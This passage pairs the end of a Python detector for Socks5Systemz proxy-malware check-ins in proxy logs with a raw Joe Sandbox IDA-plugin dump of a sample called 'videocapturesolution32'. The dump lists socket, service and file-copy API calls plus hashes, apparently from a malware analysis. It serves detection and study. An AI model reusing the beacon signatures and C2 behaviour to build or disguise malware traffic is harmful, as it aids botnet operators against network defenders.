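    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ts, src, url, ua = m.groups()
        if ua == BEACON_UA:
            alerts.append((src, "socks5systemz user-agent"))
        beacon = parse_beacon(url)
        if beacon is None:
            continue
        alerts.append((src, "check-in cid=%08x sport=%d"
                       % (beacon["cid"], beacon["sport"])))
        t = datetime.fromisoformat(ts)
        if src in last_seen:
            delta = (t - last_seen[src]).total_seconds()
            if abs(delta - BEACON_PERIOD_S) <= BEACON_PERIOD_S * PERIOD_TOLERANCE:
                alerts.append((src, "periodic check-in every %.0f s" % delta))
        last_seen[src] = t
    return alerts


if __name__ == "__main__":
    for src, reason in scan_log(SAMPLE_LOG):
        print(src, reason)
```

The query-key check deliberately requires all nine parameters and a four-digit build number; a page that happens to use `cid` or `stream` (the last sample line) does not match, while the UA rule still fires on its own for hosts whose check-in URL is not logged.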

                                                          Control-flow Graph

                                                          APIs
                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 02DB2706
                                                          • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02DB272B
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02DD5B53), ref: 02DB2738
                                                            • Part of subcall function 02DB1712: __EH_prolog.LIBCMT ref: 02DB1717
                                                          • SetWaitableTimer.KERNEL32(?,?,000493E0,00000000,00000000,00000000), ref: 02DB2778
                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 02DB27D9
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                          • String ID: timer
                                                          • API String ID: 4293676635-1792073242
                                                          • Opcode ID: 513643a6af52e0df086c455dbc714f96a7869d0c25203b3e5d07d118a4b523fa
                                                          • Instruction ID: 51e0638d2dc27f5bee998e980aae19e57eb8c6e1346a10d288748e17bba246e7
                                                          • Opcode Fuzzy Hash: 513643a6af52e0df086c455dbc714f96a7869d0c25203b3e5d07d118a4b523fa
                                                          • Instruction Fuzzy Hash: 38319AB2805B01EFD3119F25C948B66BBE8FF48714F104A2EF85682B80D770EC04CBA5

Control-flow Graph (rendered graph not preserved; summary of the exported nodes)

• 30 basic blocks, 2db2b95-2db2d38: WSASetLastError, WSARecv and a call to 2dba508 at 2db2be2-2db2c11; WSASetLastError, select and a call to 2dba508 at 2db2cbc-2db2cfa; calls to 2db166f at 2db2c7c-2db2c9a and 2db2c9c-2db2cba; call 2db1996 at 2db2d22-2db2d2d; calls to 2dc0b10 throughout; 2db2d19-2db2d1d branches back to the WSARecv block
                                                          APIs
                                                          • WSASetLastError.WS2_32(00000000), ref: 02DB2BE4
                                                          • WSARecv.WS2_32(?,?,?,?,?,00000000,00000000), ref: 02DB2C07
                                                            • Part of subcall function 02DBA508: WSAGetLastError.WS2_32(00000000,?,?,02DB2A51), ref: 02DBA516
                                                          • WSASetLastError.WS2_32 ref: 02DB2CD3
                                                          • select.WS2_32(?,?,00000000,00000000,00000000), ref: 02DB2CE7
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$Recvselect
                                                          • String ID: 3'
                                                          • API String ID: 886190287-280543908
                                                          • Opcode ID: 38bd1cab14971f8a72d30f62f8b8d4c64c1ebf965903b808b4badf64fcd31f04
                                                          • Instruction ID: fb33a37080700687a80e9497619da87b8aeb771d2ccb17cdab8cd184ec613796
                                                          • Opcode Fuzzy Hash: 38bd1cab14971f8a72d30f62f8b8d4c64c1ebf965903b808b4badf64fcd31f04
                                                          • Instruction Fuzzy Hash: 40412CB2515305DED712DF64C4287ABBBEAAF84355F104D1EE89687380EB74DD40CBA1

Control-flow Graph (rendered graph not preserved; summary of the exported nodes)

• 14 basic blocks, 2db29ee-2db2ac6: WSASetLastError, closesocket and a call to 2dba508 at 2db2a39-2db2a4c; ioctlsocket, WSASetLastError, closesocket and a call to 2dba508 at 2db2a7b-2db2aad; call 2db2f50 at 2db2a17-2db2a36; calls to 2dc0b10 at 2db2a17-2db2a36, 2db2a57-2db2a5f, 2db2a69-2db2a71 and 2db2ab3-2db2abb
                                                          APIs
                                                          • WSASetLastError.WS2_32(00000000), ref: 02DB2A3B
                                                          • closesocket.WS2_32 ref: 02DB2A42
                                                          • ioctlsocket.WS2_32(?,8004667E,00000000), ref: 02DB2A89
                                                          • WSASetLastError.WS2_32(00000000,?,8004667E,00000000), ref: 02DB2A97
                                                          • closesocket.WS2_32 ref: 02DB2A9E
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLastclosesocket$ioctlsocket
                                                          • String ID:
                                                          • API String ID: 1561005644-0
                                                          • Opcode ID: 93381772a95a2a48178340753296ec29fd4de66f78eb79f7985694dc9b4be899
                                                          • Instruction ID: 48cb9b554c4f79b7cf7ed67298feae6d206166032c07b6886a1fbda104367444
                                                          • Opcode Fuzzy Hash: 93381772a95a2a48178340753296ec29fd4de66f78eb79f7985694dc9b4be899
                                                          • Instruction Fuzzy Hash: 6D21FB72A14205EBEB21AFB8985CBAEB7E9DF45315F14496DE846D3380EB70CD40CB61

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 646 2db1ba7-2db1bcf call 2dd53f0 RtlEnterCriticalSection 649 2db1be9-2db1bf7 RtlLeaveCriticalSection call 2dbe32f 646->649 650 2db1bd1 646->650 652 2db1bfa-2db1c20 RtlEnterCriticalSection 649->652 651 2db1bd4-2db1be0 call 2db1b79 650->651 658 2db1be2-2db1be7 651->658 659 2db1c55-2db1c6e RtlLeaveCriticalSection 651->659 654 2db1c34-2db1c36 652->654 656 2db1c38-2db1c43 654->656 657 2db1c22-2db1c2f call 2db1b79 654->657 661 2db1c45-2db1c4b 656->661 657->661 664 2db1c31 657->664 658->649 658->651 661->659 663 2db1c4d-2db1c51 661->663 663->659 664->654
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 02DB1BAC
                                                          • RtlEnterCriticalSection.NTDLL ref: 02DB1BBC
                                                          • RtlLeaveCriticalSection.NTDLL ref: 02DB1BEA
                                                          • RtlEnterCriticalSection.NTDLL ref: 02DB1C13
                                                          • RtlLeaveCriticalSection.NTDLL ref: 02DB1C56
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSection$EnterLeave$H_prolog
                                                          • String ID:
                                                          • API String ID: 1633115879-0
                                                          • Opcode ID: a7b1bdf5e84ff346fd93a91e7a7685033c169150cb6267466b133a5dcb2a9ed8
                                                          • Instruction ID: d32cd90df9e4596e91e635f21a6504b1e832390ff02dd2faeb0884694107892b
                                                          • Opcode Fuzzy Hash: a7b1bdf5e84ff346fd93a91e7a7685033c169150cb6267466b133a5dcb2a9ed8
                                                          • Instruction Fuzzy Hash: CC219775A00614EFDB15CF68C494BAAFBB5FF49711F208589E84A97301DBB0ED05CBA0

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 666 402c98-402d46 GetLocalTime 668 40da80-40dc82 call 401f27 666->668 669 40d74f-40d750 666->669 675 40dc88-40dc8b 668->675 676 40216b-4021d4 668->676 669->668 676->669
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2973116991.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.2973116991.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: LocalTime
                                                          • String ID: #1;Y$/chk$p:
                                                          • API String ID: 481472006-3938946946
                                                          • Opcode ID: 174aeff93fd1e5a2b807cb43a16ede3dae5b06a99f6ad31c9884a5eeaa346480
                                                          • Instruction ID: 0ee0fe65e5c720b86506fbe8b3ea9a0a26e8e827718234d5478388d0d0c7ae03
                                                          • Opcode Fuzzy Hash: 174aeff93fd1e5a2b807cb43a16ede3dae5b06a99f6ad31c9884a5eeaa346480
                                                          • Instruction Fuzzy Hash: 3E112175E08152DAE708DBB4EF516EA7BB0A642740714013BD983FA0A2C7388D0ACB1D
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2973116991.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.2973116991.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: CountCreateEventTick
                                                          • String ID: %g
                                                          • API String ID: 785081183-2063349475
                                                          • Opcode ID: bc912a72565cee74f5a9536f5e3c211a70a5e870712f44be298132af04d2245c
                                                          • Instruction ID: df22761d22ea8c2e7b2d79e63149090690c3c770bf321ece70ac716673f71753
                                                          • Opcode Fuzzy Hash: bc912a72565cee74f5a9536f5e3c211a70a5e870712f44be298132af04d2245c
                                                          • Instruction Fuzzy Hash: 17116B76804641DBC3004B70BF66AE17BF4A306314750413AD596B21E3E238884BDA1D
                                                          APIs
                                                          • GetVersion.KERNEL32 ref: 00403336
                                                            • Part of subcall function 00404454: HeapCreate.KERNEL32(00000000,00001000,00000000,0040336F,00000000), ref: 00404465
                                                            • Part of subcall function 00404454: HeapDestroy.KERNEL32 ref: 004044A4
                                                          • GetCommandLineA.KERNEL32 ref: 00403384
                                                          • GetStartupInfoA.KERNEL32(?), ref: 004033AF
                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004033D2
                                                            • Part of subcall function 0040342B: ExitProcess.KERNEL32 ref: 00403448
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2973116991.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.2973116991.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                          • String ID:
                                                          • API String ID: 2057626494-0
                                                          • Opcode ID: b08ae2b8b777e4e577008e5565d37e94f80acee913e276c938b9cc00b58d7c54
                                                          • Instruction ID: a936b3102d24e78b19d7c169988c3063d29dd1dd2c17feae02d4b7387c8d63d1
                                                          • Opcode Fuzzy Hash: b08ae2b8b777e4e577008e5565d37e94f80acee913e276c938b9cc00b58d7c54
                                                          • Instruction Fuzzy Hash: 172183B1900615AED704AFB5DE45A6E7F68EF44705F10413EF901B72D2DB385900CB58
                                                          APIs
                                                          • WSASetLastError.WS2_32(00000000), ref: 02DB2EEE
                                                          • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02DB2EFD
                                                          • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02DB2F0C
                                                          • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02DB2F36
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$Socketsetsockopt
                                                          • String ID:
                                                          • API String ID: 2093263913-0
                                                          • Opcode ID: d8fa2f38fdea164856b69fc171325053a958da70631db2b38902f794f2f6968c
                                                          • Instruction ID: 19db9fb9dfad3930a59fe98235db3a3889edfea2a6bfde7982624aa6c0fb2516
                                                          • Opcode Fuzzy Hash: d8fa2f38fdea164856b69fc171325053a958da70631db2b38902f794f2f6968c
                                                          • Instruction Fuzzy Hash: 7E012971651204BBDB209F65DC48F9ABFA9EF89761F008599F919DB281D7708D00CB70
                                                          APIs
                                                            • Part of subcall function 02DB2D39: WSASetLastError.WS2_32(00000000), ref: 02DB2D47
                                                            • Part of subcall function 02DB2D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02DB2D5C
                                                          • WSASetLastError.WS2_32(00000000), ref: 02DB2E6D
                                                          • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02DB2E83
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$Sendselect
                                                          • String ID: 3'
                                                          • API String ID: 2958345159-280543908
                                                          • Opcode ID: 70b59a5bd2202392cce9454ece9374663c9eab858c4d07fca87e60be0c80b2cb
                                                          • Instruction ID: ec0f05c922b0450007b76355efb9958b5a477d47df37cdb7059f8bbe368060cb
                                                          • Opcode Fuzzy Hash: 70b59a5bd2202392cce9454ece9374663c9eab858c4d07fca87e60be0c80b2cb
                                                          • Instruction Fuzzy Hash: BE317072A10209DBDB12DF65C8687EE7BA6EF04358F10455ADC0697340E7B59D51CBE0
                                                          APIs
                                                          • WSASetLastError.WS2_32(00000000), ref: 02DB2AEA
                                                          • connect.WS2_32(?,?,?), ref: 02DB2AF5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLastconnect
                                                          • String ID: 3'
                                                          • API String ID: 374722065-280543908
                                                          • Opcode ID: 1d70b4fd3502d50a035f2da6e5c583e4623597607d6366e506e195d8295b44a5
                                                          • Instruction ID: 4d7c92b13b75332ebad2124021583ad93dc9f34f7b723836bfdb2933890e2b0f
                                                          • Opcode Fuzzy Hash: 1d70b4fd3502d50a035f2da6e5c583e4623597607d6366e506e195d8295b44a5
                                                          • Instruction Fuzzy Hash: C2217471E10104DBDF11EF6484286EDBBAADF44325F1045999C1997384EB748E019BA1
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID:
                                                          • API String ID: 3519838083-0
                                                          • Opcode ID: 8b3d51a2960b931702809a692f33d8aff31ed5e7047f7b2cfdee8228d9b7396b
                                                          • Instruction ID: 559e3a221654f72c9b23b93cf808d24914476744a09e62b14f5b6f3ee5b2979d
                                                          • Opcode Fuzzy Hash: 8b3d51a2960b931702809a692f33d8aff31ed5e7047f7b2cfdee8228d9b7396b
                                                          • Instruction Fuzzy Hash: C4513CB1904256DFCB45DF68D4506AABBB1FF08320F10819EE86A9B380D774DD10CFA0
                                                          APIs
                                                          • InterlockedIncrement.KERNEL32(?), ref: 02DB36A7
                                                            • Part of subcall function 02DB2420: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02DB2432
                                                            • Part of subcall function 02DB2420: PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02DB2445
                                                            • Part of subcall function 02DB2420: RtlEnterCriticalSection.NTDLL(?), ref: 02DB2454
                                                            • Part of subcall function 02DB2420: InterlockedExchange.KERNEL32(?,00000001), ref: 02DB2469
                                                            • Part of subcall function 02DB2420: RtlLeaveCriticalSection.NTDLL(?), ref: 02DB2470
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Interlocked$CriticalExchangeSection$CompareCompletionEnterIncrementLeavePostQueuedStatus
                                                          • String ID:
                                                          • API String ID: 1601054111-0
                                                          • Opcode ID: ea842e456aed57da860ace03c2c931055f38fb191dc1272ec709e2ddf4ce0068
                                                          • Instruction ID: 76f7b17218b73482d2fb7d85d05bd2967080e35a6b9674512ebd74eb61864387
                                                          • Opcode Fuzzy Hash: ea842e456aed57da860ace03c2c931055f38fb191dc1272ec709e2ddf4ce0068
                                                          • Instruction Fuzzy Hash: 5A11BFB6100209EBDB229E14CC95FEA3B6AEF00354F10455AFD53CA790CB34DC60EBA4
                                                          APIs
                                                          • __beginthreadex.LIBCMT ref: 02DC2106
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,00000002,02DBA988,00000000), ref: 02DC2137
                                                          • ResumeThread.KERNEL32(?,?,?,?,?,00000002,02DBA988,00000000), ref: 02DC2145
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseHandleResumeThread__beginthreadex
                                                          • String ID:
                                                          • API String ID: 1685284544-0
                                                          • Opcode ID: 7220b7e24f7b7f7849581c958f884488241a87535beb31bf813afaf8d8de44a3
                                                          • Instruction ID: 0d2a53fb8cf2b943efe29298e579991ff9008c63743d838a29bcb62e7aa7f628
                                                          • Opcode Fuzzy Hash: 7220b7e24f7b7f7849581c958f884488241a87535beb31bf813afaf8d8de44a3
                                                          • Instruction Fuzzy Hash: 59F0C274240202ABE7209E98DC84F95B3E8EF48324F34456EF658C7380C771AC92CA90
                                                          APIs
                                                          • InterlockedIncrement.KERNEL32(02DE72B4), ref: 02DB1ABA
                                                          • WSAStartup.WS2_32(00000002,00000000), ref: 02DB1ACB
                                                          • InterlockedExchange.KERNEL32(02DE72B8,00000000), ref: 02DB1AD7
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Interlocked$ExchangeIncrementStartup
                                                          • String ID:
                                                          • API String ID: 1856147945-0
                                                          • Opcode ID: 130ff231315363e50c9daafba7075536306015447617fc53f1b3e05bea4fc21d
                                                          • Instruction ID: 861593b24ed632a913bd0bedb5e10c56c22d6b5641531c860c7ae16a92140a1b
                                                          • Opcode Fuzzy Hash: 130ff231315363e50c9daafba7075536306015447617fc53f1b3e05bea4fc21d
                                                          • Instruction Fuzzy Hash: C5D05E31D85A149FF62076A4AC0EAB8F72CEB06615F904791FC6BC03C0EB506D2485B6
                                                          APIs
                                                          • CloseServiceHandle.ADVAPI32 ref: 0040291D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2973116991.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.2973116991.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: CloseHandleService
                                                          • String ID: vX
                                                          • API String ID: 1725840886-1561072969
                                                          • Opcode ID: 60e464b36b80733d6f9527ed0e0f11013c5fed2b9b3840347595f6311235c9ad
                                                          • Instruction ID: 75ed0369c9df28f6acf4931ccb6957978d9ea70bd98a5afa033d49298f14f2a6
                                                          • Opcode Fuzzy Hash: 60e464b36b80733d6f9527ed0e0f11013c5fed2b9b3840347595f6311235c9ad
                                                          • Instruction Fuzzy Hash: 21016B21D0E3C69ADB1657706E665F53FA1E74231071440BBC883766D3C1780C4BD72E
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2973116991.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.2973116991.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: CopyFile
                                                          • String ID: vX
                                                          • API String ID: 1304948518-1561072969
                                                          • Opcode ID: b4e02137d5301ede0af7b1b19f1642fc5c0742621ca4ecec9582720a786a71df
                                                          • Instruction ID: ff4b8d9abfc6869612d76087786a42353ce2e5bc6733d2197eb858a557ce6de4
                                                          • Opcode Fuzzy Hash: b4e02137d5301ede0af7b1b19f1642fc5c0742621ca4ecec9582720a786a71df
                                                          • Instruction Fuzzy Hash: 9FF07876C042998BEB0C5771BDA69F63BECC301325B4040BFE493B62D2D5380D49AB29
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 02DB4BF2
                                                            • Part of subcall function 02DB1BA7: __EH_prolog.LIBCMT ref: 02DB1BAC
                                                            • Part of subcall function 02DB1BA7: RtlEnterCriticalSection.NTDLL ref: 02DB1BBC
                                                            • Part of subcall function 02DB1BA7: RtlLeaveCriticalSection.NTDLL ref: 02DB1BEA
                                                            • Part of subcall function 02DB1BA7: RtlEnterCriticalSection.NTDLL ref: 02DB1C13
                                                            • Part of subcall function 02DB1BA7: RtlLeaveCriticalSection.NTDLL ref: 02DB1C56
                                                            • Part of subcall function 02DBE0F7: __EH_prolog.LIBCMT ref: 02DBE0FC
                                                            • Part of subcall function 02DBE0F7: InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02DBE17B
                                                          • InterlockedExchange.KERNEL32(?,00000000), ref: 02DB4CF2
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSection$H_prolog$EnterExchangeInterlockedLeave
                                                          • String ID:
                                                          • API String ID: 1927618982-0
                                                          • Opcode ID: 1265a098f8a82f990b60845703b6491f8174a6a46348c8b33800763896dca677
                                                          • Instruction ID: a2acd22de0e93c056bb96afdd5ea77f69078ae6aab54c85cf444d51413ee8aae
                                                          • Opcode Fuzzy Hash: 1265a098f8a82f990b60845703b6491f8174a6a46348c8b33800763896dca677
                                                          • Instruction Fuzzy Hash: 61511B75D04248DFDB16DFA8C4A4AEEBBB9EF08314F14815AE806AB352D7309E44CF60
                                                          APIs
                                                          • WSASetLastError.WS2_32(00000000), ref: 02DB2D47
                                                          • WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02DB2D5C
                                                            • Part of subcall function 02DBA508: WSAGetLastError.WS2_32(00000000,?,?,02DB2A51), ref: 02DBA516
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$Send
                                                          • String ID:
                                                          • API String ID: 1282938840-0
                                                          • Opcode ID: a44a339a3a190a2b40f90b89a417e4d02b02591597c3cf7c363bd6396b5afcca
                                                          • Instruction ID: b6ee855352dd1336b80aa49cd04223aab1092c806dfe027a06e759530579a1ce
                                                          • Opcode Fuzzy Hash: a44a339a3a190a2b40f90b89a417e4d02b02591597c3cf7c363bd6396b5afcca
                                                          • Instruction Fuzzy Hash: EF0188B6500209EFD7219F54C8549ABFBEDFF45365F20496EE89A83300EB709D00CBA1
                                                          APIs
                                                          • WSASetLastError.WS2_32(00000000), ref: 02DB8406
                                                          • shutdown.WS2_32(?,00000002), ref: 02DB840F
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLastshutdown
                                                          • String ID:
                                                          • API String ID: 1920494066-0
                                                          • Opcode ID: a7de4bf3b705f7999efb120144e2874728c43a810848ddcc022421f6fa76796f
                                                          • Instruction ID: 33eb806ff02b9b1a174e2b01e93df6a380ada5d4d7fdfc0d069a72a7bc6551de
                                                          • Opcode Fuzzy Hash: a7de4bf3b705f7999efb120144e2874728c43a810848ddcc022421f6fa76796f
                                                          • Instruction Fuzzy Hash: C6F09A71A04319CFD720AF68D420B9ABBEAFF08325F10885CE99697380D770AC00CBA1
                                                          APIs
                                                          • HeapCreate.KERNEL32(00000000,00001000,00000000,0040336F,00000000), ref: 00404465
                                                            • Part of subcall function 0040430C: GetVersionExA.KERNEL32 ref: 0040432B
                                                          • HeapDestroy.KERNEL32 ref: 004044A4
                                                            • Part of subcall function 0040482B: HeapAlloc.KERNEL32(00000000,00000140,0040448D,000003F8), ref: 00404838
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2973116991.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000004.00000002.2973116991.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocCreateDestroyVersion
                                                          • String ID:
                                                          • API String ID: 2507506473-0
                                                          • Opcode ID: 86f647c1e17f9121db62508107f35f7b6bb1c87a2647d7f3c89694d97ca3aca0
                                                          • Instruction ID: 6792b556898a49359456169ba0c82f011abfeecbff717d74d0c7f117a7ac5838
                                                          • Opcode Fuzzy Hash: 86f647c1e17f9121db62508107f35f7b6bb1c87a2647d7f3c89694d97ca3aca0
                                                          • Instruction Fuzzy Hash: 90F065F0A01302DAEB206B70AE4572A3695DBC0755F20483BFA04F51E0EA788884A91D
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2973116991.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                           • Associated: 00000004.00000002.2973116991.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_videocapturesolution32.jbxd
                                                          Similarity
                                                          • API ID: CloseQueryValue
                                                          • String ID:
                                                          • API String ID: 3356406503-0
                                                          • Opcode ID: 277dd47f19dd8218bdda12a47dc78fa2ac02a4f1b489ea0987e2fda3e0f0de4a
                                                          • Instruction ID: a16431466b0a979042936dd69ea8e6af87ee0a65c72e8a2ad2da1424c12da5ef
                                                          • Opcode Fuzzy Hash: 277dd47f19dd8218bdda12a47dc78fa2ac02a4f1b489ea0987e2fda3e0f0de4a
                                                          • Instruction Fuzzy Hash: DBC04C31A4C902DAEB141FF05F4CB293A706A087917625577D653F21E0DAFCDA09E62F
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 02DB511E
                                                            • Part of subcall function 02DB3D7E: htons.WS2_32(?), ref: 02DB3DA2
                                                            • Part of subcall function 02DB3D7E: htonl.WS2_32(00000000), ref: 02DB3DB9
                                                            • Part of subcall function 02DB3D7E: htonl.WS2_32(00000000), ref: 02DB3DC0
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.2974419275.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB1000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_2db1000_videocapturesolution32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: htonl$H_prologhtons
                                                          • String ID:
                                                          • API String ID: 4039807196-0
                                                          • Opcode ID: 5f9a839cea70d13b65b17977853b30e2301e9ab85e15ba0dbeb28319094f0e4f
                                                          • Instruction ID: 37d687289b2251ee730d152795aa4144a5cea7f03fd68951323ba7598e19c04a
